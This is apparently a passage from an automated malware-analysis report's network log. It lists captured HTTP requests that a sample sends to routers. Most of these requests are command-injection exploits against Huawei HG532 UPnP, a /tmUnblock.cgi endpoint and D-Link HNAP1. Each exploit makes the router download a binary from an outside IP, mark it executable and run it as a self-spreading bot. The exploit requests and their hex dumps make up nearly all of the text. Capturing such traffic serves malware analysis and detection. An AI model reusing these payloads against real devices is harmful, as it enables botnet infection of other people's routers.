6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
